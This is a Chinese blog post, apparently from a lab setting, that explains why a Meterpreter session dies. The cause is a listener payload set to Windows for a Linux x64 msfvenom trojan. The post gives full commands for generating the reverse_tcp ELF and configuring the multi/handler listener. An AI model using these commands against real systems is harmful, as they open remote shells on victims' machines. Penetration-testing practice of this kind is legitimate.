Meterpreter session 2 closed. Reason: Died 问题解决方法

问题描述

用msf生成Ubuntu 16.04的反向连接木马:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=172.16.252.129 LPORT=1234 -f elf > shell.elf

开启监听:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.16.252.129
set lport 1234
exploit

另一端靶机上运行shell后显示段错误:

./shell.elf 
Segmentation fault (core dumped)

msf攻击机上显示连接session关闭:

[*] Started reverse TCP handler on 172.16.252.129:1235 
[*] Sending stage (180291 bytes) to 172.16.252.138
[*] Meterpreter session 2 opened (172.16.252.129:1235 -> 172.16.252.138:55946) at 2020-04-21 21:42:43 -0400
[*] 172.16.252.138 - Meterpreter session 2 closed.  Reason: Died

反复连接,反复出错,只见session数一直增加:
在这里插入图片描述

解决方法

在网上搜索半天没发现解决方法,最后发现问题是出在msf中监听载荷的设置不一致

set payload windows/meterpreter/reverse_tcp

应该改为:

set payload linux/x64/meterpreter/reverse_tcp 

生成木马时所用载荷需要与监听载荷配置一致。修改后,重新开启监听:

set payload linux/x64/meterpreter/reverse_tcp 
exploit

重新运行shell,连接成功:
连接成功

  • 13
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 7
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值